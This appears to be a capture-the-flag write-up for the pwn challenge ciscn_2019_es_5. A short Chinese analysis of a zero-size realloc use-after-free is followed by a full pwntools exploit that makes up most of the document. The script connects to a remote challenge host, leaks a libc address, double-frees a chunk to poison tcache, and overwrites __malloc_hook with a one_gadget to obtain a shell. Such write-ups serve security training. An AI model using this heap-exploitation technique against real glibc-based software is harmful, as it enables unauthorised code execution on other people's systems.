ciscn_2019_es_5
首先，检查一下程序的保护机制
然后,我们用IDA分析一下
Create的时候,没有检查size,因此size可以为0
Edit 的时候调用了 realloc，但没有检查 size 是否为 0：如果为 0，这个 chunk 会被 free 掉，而堆指针并没有从 flist 堆指针数组里移除，这就造成了 UAF。
#coding:utf8
from pwn import *#sh = process('./ciscn_2019_es_5')
# Connection to the challenge service and the libc used for offset math.
# NOTE(review): this is a Python 2 / pwntools script (print statements,
# str padding below); the host/port and libc path are environment-specific
# and every offset derived from `libc` is only valid for this exact build.
sh = remote('node3.buuoj.cn',25051)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
# Offset of __malloc_hook inside the libc image: used to turn the leaked
# pointer into a libc base, and it is also the location overwritten later.
malloc_hook_s = libc.symbols['__malloc_hook']
# one_gadget offset for this libc build (page-specific value, not portable).
one_gadget_s = 0x10a38c


# Menu wrappers. Each one drives a single menu option by answering the
# binary's prompts in the order they appear; the prompt strings are matched
# literally with sendlineafter/sendafter, so statement order matters.

def add(size,content):
    """Menu option 1: create a chunk of `size` bytes filled with `content`.

    Per the analysis above, the binary accepts size == 0 here; that missing
    check is the root cause of the bug exploited below. A fixed program
    would reject a zero size.
    """
    sh.sendlineafter('Your choice:','1')
    sh.sendlineafter('size?>',str(size))
    sh.sendafter('content:',content)

def edit(index,content,have_content = True):
    """Menu option 2: edit chunk `index` (the binary reallocs it).

    `have_content=False` skips answering the content prompt — presumably
    the program prints none when realloc freed the chunk (size 0 case in
    the analysis above); verify against the binary if reusing.
    """
    sh.sendlineafter('Your choice:','2')
    sh.sendlineafter('Index:',str(index))
    if have_content:
        sh.sendafter('New content:',content)

def show(index):
    """Menu option 3: print the content of chunk `index`."""
    sh.sendlineafter('Your choice:','3')
    sh.sendlineafter('Index:',str(index))

def delete(index):
    """Menu option 4: free chunk `index`.

    The analysis above notes the stored pointer is not cleared after a
    realloc-free, so a later delete of the same index frees it twice.
    """
    sh.sendlineafter('Your choice:','4')
    sh.sendlineafter('Index:',str(index))
# Chunk #0 plus seven more chunks of the same size; the seven are then freed
# first (indices 1..7), and only afterwards chunk #0 is freed.
#0
add(0x100,'a')
for i in range(7):add(0x100,'b')
for i in range(1,8):delete(i)
# Per the author, freeing chunk #0 now places it in the unsorted bin.
delete(0)
# A smaller allocation is taken before reading chunk #0 back.
add(0x30,'a')
# Leak: show(0) prints the freed chunk's content; the first 6 bytes are
# read as a pointer (u64 of the 6 bytes padded to 8 with NUL).
show(0)
sh.recvuntil('Content: ')
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
# This arithmetic assumes the leaked pointer and __malloc_hook lie on the
# same 4 KiB page: keep the leak's page, replace the low 12 bits with those
# of __malloc_hook's offset. Then derive the libc base and gadget address.
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
one_gadget_addr = libc_base + one_gadget_s
# Python 2 print statements (see note at the top of the script).
print 'libc_base=',hex(libc_base)
print 'malloc_hook_addr=',hex(malloc_hook_addr)
print 'one_gadget_addr=',hex(one_gadget_addr)
# Chunk #1 is created with size 0 — the unchecked size from the analysis.
add(0,'') #1
# Editing it makes the binary realloc with size 0, which frees the chunk
# while the program keeps the dangling pointer (the UAF described above).
# Deleting the same index again is therefore a double free. A fixed binary
# would reject size 0 here and clear the stored pointer once realloc frees it.
edit(1,'',False)
delete(1)
# The next two allocations reuse the doubly-freed chunk: the first writes
# the __malloc_hook address as content, the second lands at __malloc_hook
# and writes the one_gadget address over it.
add(0x10,p64(malloc_hook_addr))
add(0x10,p64(one_gadget_addr))
# Trigger malloc once more via the create option, then hand over the session.
sh.sendlineafter('Your choice:','1')
sh.interactive()